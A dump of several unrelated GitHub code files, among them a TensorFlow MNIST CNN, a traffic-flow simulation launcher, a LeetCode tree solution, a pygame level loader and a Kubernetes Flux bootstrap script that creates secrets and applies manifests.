32]\n conv1 = tf.layers.conv2d(\n inputs=input_layer,\n filters=32,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n\n # Pooling Layer #1\n # First max pooling layer with a 2x2 filter and stride of 2\n # Input Tensor Shape: [batch_size, 28, 28, 32]\n # Output Tensor Shape: [batch_size, 14, 14, 32]\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)\n\n # Convolutional Layer #2\n # Computes 64 features using a 5x5 filter.\n # Padding is added to preserve width and height.\n # Input Tensor Shape: [batch_size, 14, 14, 32]\n # Output Tensor Shape: [batch_size, 14, 14, 64]\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n filters=64,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n\n # Pooling Layer #2\n # Second max pooling layer with a 2x2 filter and stride of 2\n # Input Tensor Shape: [batch_size, 14, 14, 64]\n # Output Tensor Shape: [batch_size, 7, 7, 64]\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n\n # Flatten tensor into a batch of vectors\n # Input Tensor Shape: [batch_size, 7, 7, 64]\n # Output Tensor Shape: [batch_size, 7 * 7 * 64]\n pool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 64])\n\n # Dense Layer\n # Densely connected layer with 1024 neurons\n # Input Tensor Shape: [batch_size, 7 * 7 * 64]\n # Output Tensor Shape: [batch_size, 1024]\n dense = tf.layers.dense(inputs=pool2_flat, units=1024, activation=tf.nn.relu)\n\n # Add dropout operation; 0.6 probability that element will be kept\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)\n\n # Logits layer\n # Input Tensor Shape: [batch_size, 1024]\n # Output Tensor Shape: [batch_size, 10]\n logits = tf.layers.dense(inputs=dropout, units=10)\n\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add `softmax_tensor` to the graph. It is used for PREDICT and by the\n # `logging_hook`.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])}\n return tf.estimator.EstimatorSpec(\n mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n\n def main(unused_argv):\n # Load training and eval data\n # mnist = tf.contrib.learn.datasets.load_dataset(\"mnist\")\n # train_data = mnist.train.images # Returns np.array\n # train_labels = np.asarray(mnist.train.labels, dtype=np.int32)\n # eval_data = mnist.test.images # Returns np.array\n # eval_labels = np.asarray(mnist.test.labels, dtype=np.int32)\n\n train_data = np.random.rand(3, 28*28).astype(np.float32)\n train_labels = np.random.randint(low=0, high=10, size=(3,))\n eval_data = train_data\n eval_labels = train_labels\n\n # Create the Estimator\n mnist_classifier = tf.estimator.Estimator(\n model_fn=cnn_model_fn, model_dir=\"/tmp/mnist_convnet_model\")\n\n # Set up logging for predictions\n # Log the values in the \"Softmax\" tensor with label \"probabilities\"\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n logging_hook = tf.train.LoggingTensorHook(\n tensors=tensors_to_log, every_n_iter=50)\n\n # Train the model\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": train_data},\n y=train_labels,\n batch_size=1,\n num_epochs=None,\n shuffle=True)\n mnist_classifier.train(\n input_fn=train_input_fn,\n steps=20,\n hooks=[logging_hook])\n\n # Evaluate the model and print results\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": eval_data},\n y=eval_labels,\n num_epochs=100,\n shuffle=False)\n eval_results = mnist_classifier.evaluate(input_fn=eval_input_fn)\n print(eval_results)\n\n\n if __name__ == \"__main__\":\n tf.app.run()","repo_name":"shtechair/ndem","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":13941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35907517999","text":"from time import time\nimport logging\n\nfrom core.utils.time_utils import spent_time\n\nlogger = logging.getLogger()\n\n\ndef timing(func):\n def wrapper(*args, **kwargs):\n t1 = time()\n logger.info(f' >> {func.__name__}: Starts')\n result = func(*args, **kwargs)\n t2 = time()\n exec_time = spent_time(t1, t2)\n logger.info(f' >> {func.__name__}: Executed in {exec_time}')\n return result\n return wrapper\n","repo_name":"stAItuned/financial-sentiment-analysis","sub_path":"core/decorators/time_decorator.py","file_name":"time_decorator.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13852821392","text":"import numpy as np\nimport networkx as nx\nimport Math.data_manyPhases as data\nfrom Math.Application import Application\nfrom Graphics.AbfrageVirtuelleSpieler import AbfrageVirtuelleSpieler\nfrom shutil import copyfile\n\n\nclass Main:\n def __init__(self, graph, R, ST, alpha, variante, kanten_queue, start_queue, ende_queue, y0_queue):\n \"\"\"\n liest Parameter aus in Zeile 3 als \"data\" spezifizierter Datei ein und startet das Programm (also erzeugt eine\n \"Application\" und ruft deren \"runner\" Methode auf).\n :param graph: Gerichteter Graph als Dictionary, falls kein Graph spezifiziert, so wird Graph aus Datei\n \"GraphenGEXF/myGraph.gexf\" eingelesen\n :param R: Liste aller Startzeitpunkte, indiziert in der Reihenfolge der Spieler\n :param ST: Liste von Tupeln, wobei k-tes Tupel (i,j) beschreibt, dass Spieler k +1 Quelle s_i und Senke t_j\n besitzt\n :param alpha: aus Intervall [0,1]. Legt Gewichtung des Einflusses der Reise- und Wartezeiten auf die Kosten\n fest, beispielsweise:\n alpha = 0: nur die Reisedauer bestimmt Kosten\n alpha = 1: nur die Wartezeit bestimmt Kosten\n alpha = 1/2 (Standardwert): Reisedauer und Wartezeit nehmen gleichen Einfluss auf Kosten\n :param variante: gibt Variante zur Kostenberechnung an; Möglichkeiten: 'A' (standard), 'B', 'C', 'D'\n :param kanten_queue: Liste, die alle Kanten mit virtueller Warteschlange, als Tupel der Form ('v','w'), enthält\n :param start_queue: Liste die zu den Einträgen in 'kanten_queue' die entsprechenden Startzeitpunkte des\n virtuellen Einflusses enthält (i-ter Eintrag in 'start_queue' bezieht sich auf i-ten Eintrag in 'kanten_queue'\n :param ende_queue: Analog zu 'start_queue' ist dies eine Liste, die die Endzeitpunkte des virtuellen Einflusses\n enthält\n :param y0_queue: Liste mit den Einflussgrößen des virtuellen Flusses, indiziert wie 'kanten_queue',\n 'start_queue', 'ende_queue'\n \"\"\"\n self.R = R\n self.ST = ST\n self.alpha = alpha\n self.variante = variante\n self.kanten_queue = kanten_queue\n self.start_queue = start_queue\n self.ende_queue = ende_queue\n self.y0_queue = y0_queue\n\n if graph is None: # liest Graph aus \"GraphenGEXF/myGraph.gexf\", falls keiner in \"Math/data.py\" angegeben ist\n self.graph, self.posit = self.import_gexf_graph()\n else:\n self.graph = graph\n self.posit = nx.shell_layout(self.graph) # verwende vorgefertigtes Layout für angegebene Graphen\n\n # erzeuge Anwendung\n self.app = Application(self.graph, self.R, self.ST, self.alpha, self.posit, self.variante, self.kanten_queue,\n self.start_queue, self.ende_queue, self.y0_queue)\n\n self.query = AbfrageVirtuelleSpieler(self.app.button_win.master, self.app.E) # erzeuge Abfragefenster\n self.query.btn_start.configure(command=self.start_runner)\n\n self.app.button_win.mainloop()\n\n @staticmethod\n def import_gexf_graph():\n \"\"\"\n Funktion zum Einlesen eines Graphen aus einer .gexf Datei\n :return: graph: gerichteter Graph als Dictionary,\n posit: Knotenpositionen als passende Koordinaten\n \"\"\"\n\n # Funktion aus 'shutil', erzeugt Kopie von 'myGraph.gexf')\n copyfile(\"GraphenGEXF/myGraph.gexf\", \"GraphenGEXF/myGraph.gexf\" + \"~\")\n\n # füge Ausdruck 'defaultedgetype=\"directed\"' zu 'myGraph.gexf' hinzu (falls noch nicht vorhanden), da sonst\n # Kantenorientierung nicht beachtet wird\n source = open( \"GraphenGEXF/myGraph.gexf\" + \"~\", \"r\")\n gexfstring = source.read()\n if \"defaultedgetype=\\\"directed\\\"\" not in gexfstring[:500]:\n destination = open( \"GraphenGEXF/myGraph.gexf\", \"w\" )\n print(\"string:\", gexfstring)\n gexfstring1, gexfstring2 = gexfstring.split(\"graph mode=\\\"static\\\"\")\n destination.write(gexfstring1 + \"graph mode=\\\"static\\\" defaultedgetype=\\\"directed\\\"\" + gexfstring2)\n destination.close()\n source.close()\n\n G = nx.read_gexf(\"GraphenGEXF/myGraph.gexf\")\n nodes = G.nodes()\n edges = G.edges()\n graph = {}\n posit = {}\n # folgende Werte werden verwendet um Koordinaten passend zu transformieren\n x_min, x_max, y_min, y_max = 1, 1, 1, 1\n for v in nodes:\n graph[nodes[v]['label']] = {}\n x = nodes[v]['viz']['position']['x'] # x- und y-Position von Knoten v\n y = nodes[v]['viz']['position']['y']\n if abs(x) > x_max: # merke betraglich größte Koordinaten\n x_max = abs(x)\n if abs(y) > y_max:\n y_max = abs(y)\n posit[nodes[v]['label']] = np.array([x, y])\n for m in edges:\n if m[0] == v:\n cap_trav = edges[m]['label'].split(\"/\")\n # speichern der Kapazität und der Reisezeit von Kante m, entnommen aus der .gexf-Datei\n graph[nodes[v]['label']][nodes[m[1]]['label']] = (int(cap_trav[0]), int(cap_trav[1]))\n # x_max, bzw. y_max beschreiben nun die betraglich größte x- bzw. y-Koordinate\n # mit Hilfe dieser werden nun die Koordinaten aller Knotenpositionen auf das Intervall [-1,1]^2 transformiert\n for v in nodes:\n posit[nodes[v]['label']][0] = posit[nodes[v]['label']][0]/x_max\n posit[nodes[v]['label']][1] = posit[nodes[v]['label']][1]/y_max\n return graph, posit\n\n def start_runner(self):\n \"\"\"\n Funktion zum Starten der Anwendung \"self.app\". Wird dem Button \"btn_start\" des Abfragefensters zugewiesen.\n Fügt der Anwendung \"self.app\" alle über das Abfragefenster \"self.query\" eingelesenen Daten virtueller Spieler\n hinzu.\n :return: Kein Rückgabewert\n \"\"\"\n for v in range(len(self.query.add_at)): # aktualisiere Listen der Daten für virtuelle Spieler\n self.app.kanten_queue.append(self.query.add_at[v])\n self.app.start_queue.append(self.query.add_start[v])\n self.app.ende_queue.append(self.query.add_end[v])\n self.app.y0_queue.append(self.query.add_y0[v])\n\n # aktiviere alle Buttons\n self.app.button_win.prev.config(state=\"normal\")\n self.app.button_win.pause.config(state=\"normal\")\n self.app.button_win.nex.config(state=\"normal\")\n self.app.run(0) # Fluss zum Zeitpunkt 0 nach eventuellem Einfügen virtueller Spieler\n # starte 'app.runner()', diese Funktion sorgt für den wiederholten Aufruf von 'app.run()'\n self.app.button_win.after(1000, self.app.runner)\n self.query.abfrage.destroy()\n self.app.unpaused = True\n return\n\n\ndef main():\n try:\n data.R\n data.ST\n except AttributeError:\n raise AttributeError('\\'R\\' und \\'ST\\' müssen in \\'data.py\\' in jedem Fall angegeben werden')\n try:\n graph = data.graph\n except AttributeError:\n graph = None\n try:\n alpha = data.alpha\n except AttributeError:\n # falls 'alpha' nicht spezifiziert, verwende Standardwert 1/2 für alle Spieler\n alpha = len(data.R) * [1/2]\n try:\n variante = data.variante\n except AttributeError:\n # falls 'variante' nicht spezifiziert, verwende Standardwert 'A'\n variante = 'A'\n try:\n kanten_queue = data.kanten_queue\n start_queue = data.start_queue\n ende_queue = data.ende_queue\n y0_queue = data.y0_queue\n except AttributeError:\n kanten_queue = []\n start_queue = []\n ende_queue = []\n y0_queue = []\n\n Main(graph,data.R,data.ST,alpha,variante,kanten_queue,start_queue,ende_queue,y0_queue)\n return 0\n\n\nmain()\n","repo_name":"GraffL/ide-repository","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"de","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"7893879522","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n#\n# 代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可\n#\n# \n# @param root TreeNode类 \n# @param sum int整型 \n# @return bool布尔型\n#\nclass Solution:\n def hasPathSum(self , root: TreeNode, sum: int) -> bool:\n data=self.dfstravel(root)\n print(data)\n if root is not None and sum==root.val:\n if root.left==None and root.right==None:\n return True\n else:\n return False\n if sum in data:\n return True\n else:\n return False\n \n def dfstravel(self, root:TreeNode)->list[int]:\n # write code here\n result=[]\n if root==None:\n return []\n if(root.left==None and root.right==None):\n result.append(root.val)\n return result\n end=[]\n temp=self.dfstravel(root.left)\n for i in range(len(temp)):\n # end.append(i)\n temp[i]+=root.val\n # i+=root.val\n data1=temp\n\n end=[]\n temp=self.dfstravel(root.right)\n for i in temp:\n end.append(i)\n data2=root.val+sum(end)\n result.append(data1)\n result.append(data2)\n return result\n# {0,2,8,-2},0\n\nif __name__==\"__main__\":\n root=TreeNode(0)\n root.left=TreeNode(2)\n root.right=TreeNode(8)\n root.left.left=TreeNode(-2)\n sl =Solution()\n sl.hasPathSum(root,0)","repo_name":"yuhanghuang/algorithm_repo","sub_path":"LeetCode/7_18_hasPathSum.py","file_name":"7_18_hasPathSum.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23567818261","text":"import pygame \nfrom settings import *\nfrom tile import Tile\nfrom player import Player\nfrom debug import debug\nfrom support import *\nfrom random import choice\nfrom pnj import *\nfrom quest import *\n\nclass Level:\n\tdef __init__(self):\n\n\t\t# get the display surface \n\t\tself.display_surface = pygame.display.get_surface()\n\n\t\t# sprite group setup\n\t\tself.visible_sprites = YSortCameraGroup()\n\t\tself.obstacle_sprites = pygame.sprite.Group()\n\n\t\t# sprite setup\n\t\tself.create_map()\n\n\tdef create_map(self):\n\t\tlayouts = {\n\t\t\t'boundary' : import_csv_layout('map/map_FloorBlocks_FloorBlocks.csv'),\n\t\t\t'objects' : import_csv_layout('map/map_FloorBlocks_Objects.csv'),\n \t\t\t'entite' : import_csv_layout('map/map_FloorBlocks_entites.csv')\n\t\t}\n \n\t\tgraphics = {\n\t\t\t'object' : import_folder('graphics/objects')\n\t\t}\n \n\t\tvide = pygame.image.load('graphics/vide.png')\n\t\tfor style,layout in layouts.items():\n\t\t\tfor row_index, row in enumerate(layout):\n\t\t\t\tfor col_index, col in enumerate(row):\n\t\t\t\t\tif col != '-1':\n\t\t\t\t\t\tx = col_index * TILESIZE\n\t\t\t\t\t\ty = row_index * TILESIZE\n\t\t\t\t\t\tif style == 'boundary':\n\t\t\t\t\t\t\tTile((x,y),[self.visible_sprites,self.obstacle_sprites],'invisible',vide)\n\t\t\t\t\t\tif style == 'objects':\n\t\t\t\t\t\t\tsurf = graphics['object'][int(col)]\n\t\t\t\t\t\t\tTile((x,y),[self.visible_sprites,self.obstacle_sprites],'objects',surf)\n\t\t\t\t\t\tif style == 'entite':\n\t\t\t\t\t\t\tif col == 'p':\n\t\t\t\t\t\t\t\tself.player = Player((x,y),[self.visible_sprites],self.obstacle_sprites)\n\t\t\t\t\t\t\tif col == 'm':\n\t\t\t\t\t\t\t\tPnj('Marie',(x,y),[self.visible_sprites],True,self.obstacle_sprites)\n\t\t\t\t\t\t\tif col == 'a':\n\t\t\t\t\t\t\t\tPnj('Alberta',(x,y),[self.visible_sprites],True,self.obstacle_sprites)\n \n\tdef run(self):\n\t\t# update and draw the game\n\t\tself.visible_sprites.custom_draw(self.player)\n\t\tself.visible_sprites.update()\n\t\tself.visible_sprites.pnj_update(self.player)\n\nclass YSortCameraGroup(pygame.sprite.Group):\n\tdef __init__(self):\n\n\t\t# general setup \n\t\tsuper().__init__()\n\t\tself.display_surface = pygame.display.get_surface()\n\t\tself.half_width = self.display_surface.get_size()[0] // 2\n\t\tself.half_height = self.display_surface.get_size()[1] // 2\n\t\tself.offset = pygame.math.Vector2()\n\n\t\t# creating the floor\n\t\tself.floor_surf = pygame.image.load('graphics/tilemap/ground.png').convert()\n\t\tself.floor_rect = self.floor_surf.get_rect(topleft = (-960,-1600))\n\n\tdef custom_draw(self,player):\n\n\t\t# getting the offset \n\t\tself.offset.x = player.rect.centerx - self.half_width\n\t\tself.offset.y = player.rect.centery - self.half_height\n\n\t\t# drawing the floor\n\t\tfloor_offset_pos = self.floor_rect.topleft - self.offset\n\t\tself.display_surface.blit(self.floor_surf,floor_offset_pos)\n\n\t\t# for sprite in self.sprites():\n\t\tfor sprite in sorted(self.sprites(),key = lambda sprite: sprite.rect.centery):\n\t\t\toffset_pos = sprite.rect.topleft - self.offset\n\t\t\tself.display_surface.blit(sprite.image,offset_pos)\n\n\tdef pnj_update(self,player):\n\t\tpnj_sprites = [sprite for sprite in self.sprites() if hasattr(sprite,'sprite_type') and sprite.sprite_type == 'pnj']\n\t\tfor pnj in pnj_sprites:\n\t\t\tpnj.pnj_update(player)","repo_name":"DorineMaillet/CellAttack","sub_path":"game/code/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70523834485","text":"#random function in python\r\n#importing(extract) module(random) and variables(pi) or function \"from\" module\r\n#modules are .py files\r\n\r\nimport random\r\nfrom math import pi, sqrt as haha #sqrt is an function /import multiple objects /change func name 'as' keyword\r\n\r\nm=0\r\ns=round(pi,2)\r\na=float(input(\"Enter pi to two decimals : \"))\r\n\r\nif a==s :\r\n for i in range(10):\r\n x=random.randint(1,3) #(start,end)\r\n a=int(input(\"Guess the number : \"))\r\n if a==x :\r\n m+=1\r\n print(\"HUhh!\")\r\n else : print(\"Random number is \",x)\r\n \r\ny=haha(m) #sqrt(m)\r\nprint(\"Your score is \",m)\r\nprint(m,\"squared root is\",y)\r\n","repo_name":"lawun330/Python_Basics","sub_path":"magic numbers.py","file_name":"magic numbers.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"24726732198","text":"import argparse\nimport os\nimport json\nimport base64\nimport pathlib\n\nfrom kubernetes import client, utils\nfrom kubernetes.client import Configuration, ApiClient\nfrom pyrage import x25519\nfrom termcolor import colored\n\nfrom core.base_configuration import BaseConfiguration\nfrom core.run_context import run\n\nAGE_PUBLIC_KEY_FILE = (pathlib.Path(\n __file__).parent.parent / \"age.pubkey\").resolve()\n\n\nclass ClusterConfiguration(BaseConfiguration):\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n\n self.steps = [\n self.create_flux_system_namespace,\n self.setup_age_secret,\n self.setup_github_secret,\n\n ]\n\n def create_flux_system_namespace(self, log_prefix: str | None = None, **kwargs):\n all_namespaces = self.v1.list_namespace()\n if \"flux-system\" in [ns.metadata.name for ns in all_namespaces.items]:\n self.log(log_prefix, colored(\n \"flux-system namespace already exists\", \"yellow\"))\n return\n self.log(log_prefix, \"Creating flux-system namespace\")\n self.v1.create_namespace(body={\"metadata\": {\"name\": \"flux-system\"}})\n\n def setup_age_secret(self, log_prefix: str | None = None, **kwargs):\n # get the current secrets\n current_secrets = self.v1.list_namespaced_secret(\n namespace=\"flux-system\")\n # check if the secret already exists\n if \"sops-age\" in [secret.metadata.name for secret in current_secrets.items]:\n if not kwargs.get(\"force_age_secret\", False):\n self.log(log_prefix, colored(\n \"Age secret already exists, skipping\", \"blue\"))\n return\n self.log(\n log_prefix,\n colored(\n \"Age secret already exists, but force_age_secret is set to True, recreating\", \"yellow\"),\n )\n self.log(log_prefix, colored(\n \"Deleting existing age secret\", \"red\"))\n self.v1.delete_namespaced_secret(\n name=\"sops-age\", namespace=\"flux-system\")\n # create the secret\n self.age_id = x25519.Identity.generate()\n self.age_pubkey = str(self.age_id.to_public())\n self.age_privkey = str(self.age_id)\n secret = {\n \"kind\": \"Secret\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"sops-age\",\n \"namespace\": \"flux-system\",\n },\n \"data\": {\n \"age.agekey\": base64.b64encode(self.age_privkey.encode()).decode()\n },\n }\n self.log(log_prefix, \"Creating secret\", json.dumps(secret, indent=4))\n self.v1.create_namespaced_secret(namespace=\"flux-system\", body=secret)\n with open(AGE_PUBLIC_KEY_FILE, \"w\") as f:\n self.log(log_prefix, f\"Writing age public key to\", colored(\n AGE_PUBLIC_KEY_FILE, \"green\", attrs=[\"bold\"]))\n f.write(self.age_pubkey)\n\n def setup_github_secret(self, log_prefix: str | None = None, **kwargs):\n # get the current secrets\n current_secrets = self.v1.list_namespaced_secret(\n namespace=\"flux-system\")\n # check if the secret already exists\n if \"github-flux-auth\" in [secret.metadata.name for secret in current_secrets.items]:\n if not kwargs.get(\"force_github_secret\", False):\n self.log(log_prefix, colored(\n \"Github secret already exists, skipping\", \"blue\"))\n return\n self.log(\n log_prefix,\n colored(\n \"Github secret already exists, but force_github_secret is set to True, recreating\", \"yellow\"),\n )\n self.log(log_prefix, colored(\n \"Deleting existing github secret\", \"red\"))\n self.v1.delete_namespaced_secret(\n name=\"github-flux-auth\", namespace=\"flux-system\")\n # create the secret\n gh_user = kwargs.get(\"gh_user\")\n if not gh_user:\n self.log(log_prefix, colored(\n \"No github user provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No github user provided. Please provide a github user using the --gh-user flag\")\n gh_password = kwargs.get(\"gh_password\")\n if not gh_password:\n self.log(log_prefix, colored(\n \"No github password provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No github password provided. Please provide a github password using the --gh-password flag\")\n\n secret = {\n \"kind\": \"Secret\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"github-flux-auth\",\n \"namespace\": \"flux-system\",\n },\n \"data\": {\n \"username\": base64.b64encode(f\"{gh_user}\\n\".encode()).decode(),\n \"password\": base64.b64encode(f\"{gh_password}\\n\".encode()).decode(),\n }\n }\n self.log(log_prefix, \"Creating secret\", json.dumps(secret, indent=4))\n self.v1.create_namespaced_secret(namespace=\"flux-system\", body=secret)\n\n\nclass FluxConfiguration(BaseConfiguration):\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.kubeconfig = kwargs.get(\"kube_config\")\n self.cluster_name = kwargs.get(\"cluster_name\")\n self.gh_repo = kwargs.get(\"gh_repo\")\n self.gh_user = kwargs.get(\"gh_user\")\n self.cluster_path = pathlib.Path(\n __file__).parent.parent / \"clusters\" / self.cluster_name\n self.infra_path = self.cluster_path / \"infrastructure.yaml\"\n self.apps_path = self.cluster_path / \"apps.yaml\"\n self.source_path = self.cluster_path / \"source.yaml\"\n self.flux_path = self.cluster_path / \"flux.yaml\"\n\n self.steps = [\n self.check_config,\n self.flux_preflight_check,\n self.generate_flux_source,\n self.install_flux,\n self.install_apps,\n ]\n\n def check_config(self, log_prefix: str | None = None, **kwargs):\n\n if self.kubeconfig is None:\n self.log(self.__class__.__name__, colored(\n \"No kubeconfig provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No kubeconfig provided. Please provide a kubeconfig using the --kube-config flag\")\n self.env = {\"KUBECONFIG\": self.kubeconfig, \"PATH\": os.environ[\"PATH\"]}\n\n if self.gh_repo is None:\n self.log(log_prefix, colored(\n \"No github repo provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No github repo provided. Please provide a github repo using the --gh-repo flag\")\n\n if self.gh_user is None:\n self.log(log_prefix, colored(\n \"No github user provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No github user provided. Please provide a github user using the --gh-user flag\")\n\n if self.cluster_name is None:\n self.log(log_prefix, colored(\n \"No cluster name provided\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n \"No cluster name provided. Please provide a cluster name using the --cluster-name flag\")\n\n if not self.cluster_path.exists():\n self.log(log_prefix, colored(\n f\"Cluster path {self.cluster_path} does not exist\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n f\"Please ensure you have created a directory for cluster {self.cluster_name} as described in the README and provide a valid cluster name using the --cluster-name flag\")\n\n if not self.infra_path.exists():\n self.log(log_prefix, colored(\n f\"Infrastructure file {self.infra_path} does not exist\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n f\"Please ensure you have created an {self.infra_path} file for cluster {self.cluster_name} as described in the README\")\n\n if not self.apps_path.exists():\n self.log(log_prefix, colored(\n f\"Applications file {self.apps_path} does not exist\", \"red\", attrs=[\"bold\", \"blink\"]))\n raise ValueError(\n f\"Please ensure you have created an {self.apps_path} file for cluster {self.cluster_name} as described in the README\")\n\n def flux_preflight_check(self, log_prefix: str | None = None, **kwargs):\n self.run_process([\"flux\", \"check\", \"--pre\"], log_prefix=log_prefix)\n\n def generate_flux_source(self, log_prefix: str | None = None, **kwargs):\n cmd = [\n \"flux\", \"create\", \"source\", \"git\", \"flux-system\",\n \"--url\", self.gh_repo,\n \"--branch\", \"main\",\n \"--interval\", \"1m\",\n \"--export\"\n ]\n repo_name = self.gh_repo.split(\"/\")[-1]\n if self.is_gh_repo_private(self.gh_user, repo_name):\n self.log(log_prefix, colored(\n \"Github repo is private. Will use github-flux-auth secret\", \"yellow\"))\n cmd.extend(\n [\n \"--secret-ref\", \"github-flux-auth\",\n ]\n )\n else:\n self.log(log_prefix, colored(\n \"Github repo is public. Will not use github-flux-auth secret or username/password\", \"yellow\"))\n\n code, out, err = self.run_process(cmd, log_prefix=log_prefix)\n\n self.log(log_prefix, colored(\n f\"Writting flux source to {self.source_path}\", \"yellow\", attrs=[\"bold\"]))\n with open(str(self.source_path), \"w\") as f:\n f.write(out)\n\n def install_flux(self, log_prefix: str | None = None, **kwargs):\n code, out, err = self.run_process([\"flux\", \"install\", \"--export\",\n f\"{self.flux_path}\"], log_prefix=log_prefix)\n self.log(log_prefix, f\"Writing Flux CRDs to {self.flux_path}\")\n with open(str(self.flux_path), \"w\") as f:\n f.write(out)\n self.log(log_prefix, colored(\n f\"Flux installed, please check {self.flux_path} for any errors\", \"green\", attrs=[\"bold\"]))\n self.log(log_prefix, colored(\n f\"Executing `kubectl apply -f {self.flux_path} to install flux\", \"green\", attrs=[\"bold\"]))\n try:\n utils.create_from_yaml(self.api_client, str(\n self.flux_path), namespace=\"flux-system\")\n except utils.FailToCreateError as e:\n self.log_k8s_api_error(log_prefix, e)\n\n def install_apps(self, log_prefix: str | None = None, **kwargs):\n self.log(log_prefix, colored(\n f\"Setting up GitReposority/flux-system from {self.source_path}\", \"green\", attrs=[\"bold\"]))\n self.run_process(\n [\"kubectl\", \"apply\", \"-f\", str(self.source_path)], log_prefix=log_prefix)\n\n self.log(log_prefix, colored(\n f\"Setting up Infrastructure from {self.infra_path}\", \"green\", attrs=[\"bold\"]))\n self.run_process(\n [\"kubectl\", \"apply\", \"-f\", str(self.infra_path)], log_prefix=log_prefix)\n\n self.log(log_prefix,\n colored(f\"Setting up Apps from {self.apps_path}\", \"green\", attrs=[\"bold\"]))\n self.run_process(\n [\"kubectl\", \"apply\", \"-f\", str(self.apps_path)], log_prefix=log_prefix)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Flux configuration\")\n parser.add_argument(\"--kube-config\", type=str,\n help=\"Path to kubeconfig file\")\n parser.add_argument(\n \"--force-age-secret\",\n action=\"store_true\",\n help=\"Force the creation of the age secret\",\n )\n parser.add_argument(\n \"--gh-user\", type=str, help=\"Github user with acccess to this repo\"\n )\n parser.add_argument(\n \"--gh-password\",\n type=str,\n help=\"Github password for the user with acccess to this repo\",\n )\n parser.add_argument(\n '--force-github-secret', action='store_true', help='Force the creation of the github secret'\n )\n parser.add_argument(\n '--cluster-name', type=str, help='Name of the cluster. {dev, staging, production}'\n )\n parser.add_argument(\n '--gh-repo', type=str, default=\"https://github.com/maany/flux-play\", help='URL of the github repo containing flux values'\n )\n args = parser.parse_args()\n with run(\n \"kubectl\",\n \"proxy\",\n \"--port=8080\",\n env={\"KUBECONFIG\": args.kube_config, \"PATH\": os.environ[\"PATH\"]},\n ) as proc:\n print(\"Kubectl proxy started\")\n print(\"Waiting for kubectl proxy to start\")\n while True:\n try:\n kubeconfig = Configuration()\n kubeconfig.host = \"http://127.0.0.1:8080\"\n api_client = ApiClient(configuration=kubeconfig)\n kubectl = client.CoreV1Api(api_client=api_client)\n kubectl.list_node()\n print(\"Kubectl proxy is ready\")\n break\n except Exception as e:\n print(\"Kubectl proxy is not ready yet\")\n pass\n\n cluster_config = ClusterConfiguration(\n force_age_secret=args.force_age_secret,\n gh_user=args.gh_user,\n gh_password=args.gh_password,\n force_github_secret=args.force_github_secret,\n )\n cluster_config.run()\n\n flux_config = FluxConfiguration(\n force_age_secret=args.force_age_secret,\n gh_user=args.gh_user,\n gh_password=args.gh_password,\n force_github_secret=args.force_github_secret,\n kube_config=args.kube_config,\n gh_repo=args.gh_repo,\n cluster_name=args.cluster_name\n )\n flux_config.run()\n\n proc.terminate()\n 